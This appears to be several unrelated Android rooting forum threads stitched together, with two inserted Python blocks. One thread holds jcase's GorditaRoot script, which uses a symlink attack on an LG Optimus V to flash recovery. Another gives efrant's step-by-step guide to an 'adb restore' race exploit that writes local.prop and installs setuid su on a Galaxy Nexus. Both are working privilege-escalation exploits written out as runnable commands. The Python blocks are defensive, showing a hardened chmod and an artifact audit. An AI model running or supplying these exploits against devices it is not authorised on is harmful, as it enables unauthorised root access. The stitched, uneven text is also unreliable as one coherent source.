Hi, been lurking awhile, registered to clear up some things.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.
Huxleysäl said:
Hi, been lurking awhile, registered to clear up some things.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.
I think you are mistaken. In a terminal emulator type: cd /data/local/tmp
Edit: Fixed a mistake made by auto correct...
Sent from my Galaxy Nexus using Tapatalk
efrant said:
I think you are mistaken. In a terminal emulator type: cd /data/local/temp
Sent from my Galaxy Nexus using Tapatalk
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links
try /data/local/tmp
Huxleysäl said:
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk
efrant said:
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, putting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb
Huxleysäl said:
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, putting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk
OK, this is exactly what I did:
I downloaded the files, extracted them into the ./sdcard folder of my android. I opened the console, wrote exactly as stated. Reaction? Cannot create /data/local/tmp/mempodroid: Permission denied
So, what I'm thinking is this: I tried the cd ./sdcard/mempodroid, found it. So, logically, that should mean that since the permission is denied, the problem lies not in where I put the mempodroid, but with my authority over my phone. So, here we are again. Could anybody smarter than me clarify?
efrant said:
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk
****, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.
Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.
convolution said:
Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.
I had my initial problems with that too. But as of this moment it doesn't really matter. Read above posts. Anyhow, to answer your question: you need to download a console emulator.
Just search for it in the market. Also the commands go in this console.
For example: cat /directory/filename > /newdirectory/samefilename means to copy or move from one place. To change permission you just write that line of code ending with 777 instead of cat and then the filename etc and etc.
I didn't know any of this 'till yesterday, so it is quite understandable.
cheers
Huxleysäl said:
F***, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.
I've updated the first post. Give that a go and let me know how it turns out. (The guide may need some minor tweaking, but I am here to help you through it.)
It seems that ADB has rw access to /data/local/tmp but a terminal emulator on-device does not. So for now, you need to be plugged into your computer.
It may be possible to do this with ADB-over-Wi-Fi, but I haven't gotten there yet.

Gordita Root: Optimus V exploit March 24th 2012

This is an exploit, I take NO RESPONSIBILITY if this does ANYTHING bad, your fault not mine, it was only tested on the firmware mentioned below. If you redistribute it, republish, work it into an all in one click, please link back and PROPERLY credit me.
Tested on the
ro.build.date=Mon Jan 30 10:42:53 KST 2012
ro.build.version.incremental=ZV9.479A6632
Update for the VirginMobile LG Optimus V
Your phone needs to be updated to the above build, and potentially needs a factory reset before this works, but it works fine. This will allow you to flash recovery without being root. After flashing recovery, flash this zip http://dl.dropbox.com/u/8699733/rootme.zip to install su, superuser and disable re-flashing of the stock recovery
Linux/Mac Script + files:
https://github.com/CunningLogic/GorditaRoot
Flash_image:
https://github.com/CunningLogic/GorditaRoot/blob/master/flash_image
Recovery:
http://www.mediafire.com/?vzc5k8taj9smmll (Credit BobZhome)
Windows users run the commands manually
GNU nano 2.2.2 File: Gordita.sh
Code:
#!/bin/sh
echo "GorditaRoot 1.0 by jcase / TeamAndIRC"
echo "for the VM670 Optimus V"
echo "March 21st 2012"
echo "Follow me! http://www.twitter.com/TeamAndIRC"
echo "Donations are optional http://forum.xda-developers.com/donatetome.php?u=2376614"
echo "-"
echo "Recovery taken from http://forum.xda-developers.com/showthread.php?t=1197991"
echo "-"
echo "Pushing recovery to /data/local/"
adb push VM670NH_recovery.img /data/local/recovery.img
adb push flash_image /data/local/
adb shell "chmod 755 /data/local/flash_image"
echo "Removing old sensor config, setting up symlink attack"
adb shell "rm /data/amit/*"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config.ini"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config2.ini"
echo "Rebooting to execute symlink attack, to chmod 666 the recovery block device"
adb reboot
adb wait-for-device
sleep 10
adb shell "rm /data/amit/*"
adb shell "/data/local/flash_image recovery /data/local/recovery.img"
echo "Recovery flashed! Enjoy"
Having trouble identifying whether or not you completed the root process? Quickly test for root access with Root Checker Basic
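The script above relies on something privileged changing the mode of the sensor config files under /data/amit at boot and following the symlinks planted there. As an added example (not jcase's code and not the vendor's), this Python sketch puts that weak pattern beside a hardened one, using constructed stand-in files; which component performs the chmod is not stated in the post, and the function names are hypothetical.

```python
import os
import stat
import tempfile


def chmod_following_symlinks(path, mode=0o666):
    """Weak pattern: os.chmod() resolves symlinks, so the mode lands on the link target."""
    os.chmod(path, mode)


def chmod_regular_file_only(path, mode=0o600):
    """Hardened pattern: refuse symlinks and non-regular files, then act on the open fd.

    O_NOFOLLOW only protects the final path component; the directory itself
    should also not be writable by a less privileged user.
    """
    flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK
    try:
        fd = os.open(path, flags)
    except OSError:
        return False  # ELOOP for a symlink, ENOENT if the file is missing
    try:
        st = os.fstat(fd)
        # Reject devices, FIFOs and hard links to files that live elsewhere.
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            return False
        os.fchmod(fd, mode)  # applies to the inode we verified, not to a path
        return True
    finally:
        os.close(fd)


def demo():
    """Constructed stand-ins: 'block_device' plays /dev/mtd/mtd2, 'config_dir' plays /data/amit."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "block_device")
        with open(target, "w") as fh:
            fh.write("stand-in")
        os.chmod(target, 0o600)

        config_dir = os.path.join(root, "config_dir")
        os.mkdir(config_dir)
        link = os.path.join(config_dir, "AMI304_Config.ini")
        os.symlink(target, link)

        # Hardened call first: the symlink is refused and the target keeps 0600.
        hardened_ok = chmod_regular_file_only(link)
        mode_after_hardened = stat.S_IMODE(os.stat(target).st_mode)

        # Weak call: the target behind the symlink becomes world-writable.
        chmod_following_symlinks(link)
        mode_after_weak = stat.S_IMODE(os.stat(target).st_mode)

        # A genuine regular config file is still handled, with a tighter mode.
        real = os.path.join(config_dir, "AMI304_Config2.ini")
        with open(real, "w") as fh:
            fh.write("x")
        real_ok = chmod_regular_file_only(real)
        real_mode = stat.S_IMODE(os.stat(real).st_mode)
    return hardened_ok, mode_after_hardened, mode_after_weak, real_ok, real_mode


if __name__ == "__main__":
    print(demo())
```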
Confirmed working on a phone donated just for this purpose!
Started with stock firmware, Android 2.2.1, baseband VM670ZV4_60401001, generic android recovery
Flashed the VirginMobile Security Update from their website, became VM670ZV9_60401001 ZV9.479A6632
Manually walked through above script by jcase via gtalk, and using the exploit, was able to flash BobZhome's CWM for the VM670, reboot into it and made a backup.
Flashed the su zip, and all is well in Optimus V land again.
HUGE THANKS TO JCASE FOR TAKING THE TIME TO RE-ROOT THE VM670!!!
I only wish I understood what it all meant--so I could be excited, too!
wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
Means ppl who couldnt root before, now can
wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
i was gonna ask the same thing LOL
Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version (I believe v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!
jlear3 said:
Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version (I believe v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!
The update is not being pushed, because the OTA mechanism doesn't work on the OV. You have to go to the VM website and download the update from the phone FAQ.
The only advantage is a new radio, which give slightly improved performance.
Thank you very much!
I installed the update to my (unmodded) backup phone without thinking about whether or not I'd be able to root the handset after applying it. DOH!
I have just been using this phone as a WiFi device so far. I have run the battery down and recharged it once and installed a few apps on it. So I will run it down, recharge it again and then do a factory reset before I try rooting it just to make sure that I don't hose it.
It's a good idea to check all the steps before you start ...
Finally ran my battery down for the second time. So, I recharged, ran a factory re-set and ran the shell script on my Linux box to root the phone.
Oops!
The file VM670NH_recovery.img downloaded as VM670NH_recovery.bin and the system can't find/stat it! Hit ^C and bailed!
Hoping, hoping, hoping ...
Good! It's not bricked!
Renamed the recovery file, re-ran the script. Success!!
Rebooted into recovery, flashed rootme.zip
==> Did a nandroid backup.
Downloaded root check basic app and confirmed that it has worked.
So, for other modders trying this out:
Check your files and file names before you start! When I looked at Gordita.sh the first time I found that what I had downloaded was an HTML file with the script embedded in it. Copied and pasted from the OP and then checked again to make sure I had the right content.
Of course if you are running the adb commands manually then this won't happen to you.
But, as I noted above, I didn't cross-check that the recovery file that the script would be looking for had the right file name extension (.img, not .bin), so don't be me.
That said, jcase: Thank You Very Much!! Not only for developing this root exploit but also for making one that is robust enough for someone like me to goober it up and still come out unburnt!
After all of this , can you make it a hotspot in quick settings?
The setting dialog is there ..
H0daddy said:
After all of this , can you make it a hotspot in quick settings?
Once I rooted my phone I installed a modified ROM. And then another one, and then ...
I saw your question a bit ago and since I no longer had the stock ROM installed (and had never used Quick Settings to enable the hotspot feature before) I didn't know. I still don't. Here is the story on that ...
I just restored the ZV9 ROM from backup today and then installed the Quick Settings app. I can say that the app still has the option to enable the hotspot available and that it tries to set it up. However the phone I am using hasn't been activated yet and the 3G network isn't provisioned on it. So all I get is a message saying the network isn't available.
So, it looks somewhat promising. Maybe someone who has an activated phone with the ZV9 ROM can test it out and let you know.
And if I activate this phone before you get a useful reply I'll test it to see if it works.
So happy to see this
Please assist
Got up to step adb shell "chmod 755 /data/local/flash_image"
But got back "no such file."
CWM
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?
knicks791 said:
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?
so you have bobz recovery installed?... i assume you've tried rebooting to recovery from the powered off state via the key combo (HOLD home+vol down+power, RELEASE after the LG logo), and tried install zip from sd again?...
try:
http://forums.projectopencannibal.net/beta-releases-11/lg-optimus-v-v2-1dev1-(10-09-2012)/
http://forums.projectopencannibal.n...1-universal-installer-for-lg-optimus-devices/

[HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)

As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer. (My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.)
Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!
Disclaimer: I take no credit for this exploit or the implementation of it. All credit goes to Bin4ry and his team. I just isolated the parts required for the GNex, modified it slightly and eliminated the script.
So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here. (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to backup our data, unlock the bootloader and restore the backup, so this guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.
How this works
The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.
So what does this all mean:
You can now root any version of ICS and JB released to-date without having to unlock your bootloader (and without losing your data).
Moreover, you should now be able to root your device even if your hardware buttons are not working.
Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.
Notes:
1) Please read the entire post before attempting this.
2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.
3) This assumes that you have USB Debugging enabled on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.
Step-by-step:
1) Download the attached files to your computer and unzip them;
2) Open a command prompt in that same directory;
3) Copy the root files to your device:
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Restore the fake "backup": adb restore fakebackup.ab Note: do not click restore on your device. Just enter the command into the command prompt on your PC and press the enter key.
5) Run the "exploit": adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" Note: when you enter this command, you should see your adb window flooded with errors -- this is what is supposed to happen.
6) Now that the "exploit" is running, click restore on your device.
7) Once it finishes, reboot your device: adb reboot Note: Do not try and use your device when it reboots. Running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker -- this is normal.
8) Once it is rebooted, open a shell: adb shell
Note: Once you do step 8, you should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11.)
Now we can copy su and Superuser.apk to the correct spots to give us root.
9) Mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) Change permissions on su: chmod 06755 /system/bin/su
12) Symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) Copy Superuser.apk to /system: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
14) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
15) Delete the file that the exploit created: rm /data/local.prop
16) Exit the ADB shell: exit (May have to type exit twice to get back to your command prompt.)
17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter): adb shell "sync; sync; sync;"
18) Reboot: adb reboot
19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.
Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:
10b) Change the owner of su: chown 0.0 /system/bin/su (Thanks maxrfon.)
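For checking a device afterwards, the artifacts named in the steps above (and in the su install steps of the earlier 4.0.1/4.0.2 guide) can be looked for directly. This is an added example, not part of efrant's guide or Bin4ry's package: the listing format (mode owner group path [-> target]), the function names and the sample data are constructed assumptions.

```python
import re

SU_DIRS = ("/system/bin/", "/system/xbin/")

# One entry per line: "<mode> <owner> <group> <path>[ -> <link target>]" (assumed format).
LISTING = re.compile(
    r"^(?P<mode>[-dlcbps][-rwxsStT]{9})\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<path>\S+)(?:\s+->\s+(?P<target>\S+))?$"
)


def parse_props(text):
    """Parse Android .prop text into (key, value) pairs; comments and blanks are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        pairs.append((key.strip(), value.strip()))
    return pairs


def audit(local_prop_text, listing_lines):
    """Return findings for the artifacts this procedure leaves behind.

    local_prop_text: contents of /data/local.prop, or None if the file is absent.
    listing_lines:   file listing collected from the device in the assumed format.
    """
    findings = []
    if local_prop_text is not None:
        for key, value in parse_props(local_prop_text):
            # Step 15 deletes this file; if the line is still there the device
            # keeps booting with a root adb shell.
            if key == "ro.kernel.qemu" and value == "1":
                findings.append("local.prop sets ro.kernel.qemu=1")
    for line in listing_lines:
        m = LISTING.match(line.strip())
        if not m:
            continue
        mode, owner = m["mode"], m["owner"]
        path, target = m["path"], m["target"]
        is_su = path.startswith(SU_DIRS) and path.rsplit("/", 1)[1] == "su"
        if mode[0] == "l" and target == "/data/local.prop":
            findings.append(f"symlink to /data/local.prop: {path}")
        elif is_su and mode[0] == "l":
            findings.append(f"su symlink: {path} -> {target}")
        elif is_su and mode[0] == "-" and mode[3] in "sS" and owner == "root":
            findings.append(f"setuid-root su: {path}")
    return findings


# Constructed sample data, shaped after the paths used in the guide.
SAMPLE_LOCAL_PROP = "# constructed sample\nro.kernel.qemu=1\n"
SAMPLE_LISTING = [
    "-rwsr-sr-x root root /system/bin/su",
    "lrwxrwxrwx root root /system/xbin/su -> /system/bin/su",
    "-rwxr-xr-x root shell /system/bin/sh",
    "lrwxrwxrwx shell shell /data/data/com.android.settings/a/file99 -> /data/local.prop",
    "-rw-r--r-- root root /system/app/Superuser.apk",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_LOCAL_PROP, SAMPLE_LISTING):
        print(finding)
```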
I've done all. It installs superuser app but the phone is not really rooted and apps that require it don't work
Lorenzo_9 said:
I've done all. It installs superuser app but the phone is not really rooted and apps that require it don't work
Did you try opening the Superuser app?
What happens when you open an app that requires root? Do you get the request for su access?
You can open the app but with apps that require root there are no requests and they don't... Even using root checker you see that you're not rooted
Lorenzo_9 said:
You can open the app but with apps that require root there are no requests and they don't... Even using root checker you see that you're not rooted
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
efrant said:
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?
Lorenzo_9 said:
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?
Yes, I put the latest versions in the zip in the first post.
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.
Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
serty4011 said:
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.
Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
Thanks for confirming that step was not needed.
Thanks!
Bookmarked for future reference :good:
does it work on nexus 7 ?
dacc said:
does it work on nexus 7 ?
Yes, it should.
thanks for quick response
Works fine for my GNex, big thanks! How about putting it into a script for non-advanced users here?
wictor1992 said:
Works fine for my GNex, big thanks! How about putting it into a script for non-advanced users here?
Glad you got it working!
As for putting it into a script, I could but I'd rather not. As with most of the guides that I have written up, I purposely do not put things into a script so that people would actually go through all the steps and, by doing so, maybe get an understanding of what they are actually doing, and hopefully learn something in the process. If I would have packaged it up into a script, a lot of the less experienced users would not even try to go through the steps -- they would just use the script, and no one learns anything yet again. See here for some discussion on one-click scripts. Granted, blindly following a step-by-step is not much better, but I have tried to put comments and explanations throughout to facilitate learning. It's about the journey...
P.S.: I would appreciate it if no one else posts a script in this thread.
efrant said:
P.S.: I would appreciate it if no one else posts a script in this thread.
can i make a script that just puts in big text "STOP USING TOOLKITS AND 1 CLICKS"
Zepius said:
can i make a script that just puts in big text "STOP USING TOOLKITS AND 1 CLICKS"
LOL! Yes, sure, that's one script I don't mind being posted. LOL!
Heh, fair enough. I think I'm learning a bit about adb
One question: I can't replace system APKs by installing them, it tells me that there is a signature conflict. How can I fix that? I thought it shouldn't happen after rooting. (I'm trying to install the "international" velvet.apk).
wictor1992 said:
Heh, fair enough. I think I'm learning a bit about adb
One question: I can't replace system APKs by installing them, it tells me that there is a signature conflict. How can I fix that? I thought it shouldn't happen after rooting. (I'm trying to install the "international" velvet.apk).
Let's try to keep this thread on-topic please.
But to answer your question, don't install the apk. Using a file explorer that has root access, copy it to /system/app (after making sure that system is r/w) and make sure the permissions are set to match the other apks in that directory.
when running adb after running the command where i tell it to restore fake restore and then while the "exploit" is running I keep getting, in cmd, link failed, no such file or directory, and it just keeps doing that. is this normal or did i do something wrong?
efrant said:
Let's try to keep this thread on-topic please.
But to answer your question, don't install the apk. Using a file explorer that has root access, copy it to /system/app (after making sure that system is r/w) and make sure the permissions are set to match the other apks in that directory.
